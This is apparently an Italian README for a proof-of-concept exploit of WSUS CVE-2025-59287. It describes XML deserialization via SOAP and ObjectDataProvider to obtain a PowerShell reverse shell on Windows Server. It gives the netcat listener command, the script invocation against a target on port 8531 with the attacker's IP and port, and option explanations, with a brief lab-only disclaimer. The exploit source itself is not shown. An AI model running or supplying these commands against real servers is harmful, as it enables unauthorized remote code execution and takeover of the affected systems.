
PoC exploit per WSUS CVE-2025-59287 che utilizza la deserializzazione XML per ottenere una reverse shell Windows tramite SOAP e ObjectDataProvider.
WSUS CVE-2025-59287 – Deserializzazione XML RCE (Reverse Shell) Un PoC mirato per sfruttare WSUS CVE-2025-59287 tramite deserializzazione XML per ottenere una reverse shell Windows. Questo script supporta solo un payload di reverse shell (nessun fallback calc). Target: Windows Server con ruolo WSUS Tecnica: deserializzazione SOAP + ObjectDataProvider Risultato: cmd.exe avvia una reverse shell PowerShell verso il tuo listener Disclaimer Solo per test autorizzati in ambienti di laboratorio. Sei responsabile del rispetto di tutte le leggi applicabili. Requisiti Python 3.x Accesso di rete agli endpoint WSUS (di solito 8530/8531) Listener sulla tua macchina (es. nc)
nc -lvnp 4444
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u: URL base WSUS (http/https, tipicamente porta 8530/8531) -l: Il tuo IP per ricevere la shell -p: La porta del tuo listener --debug: Output dettagliato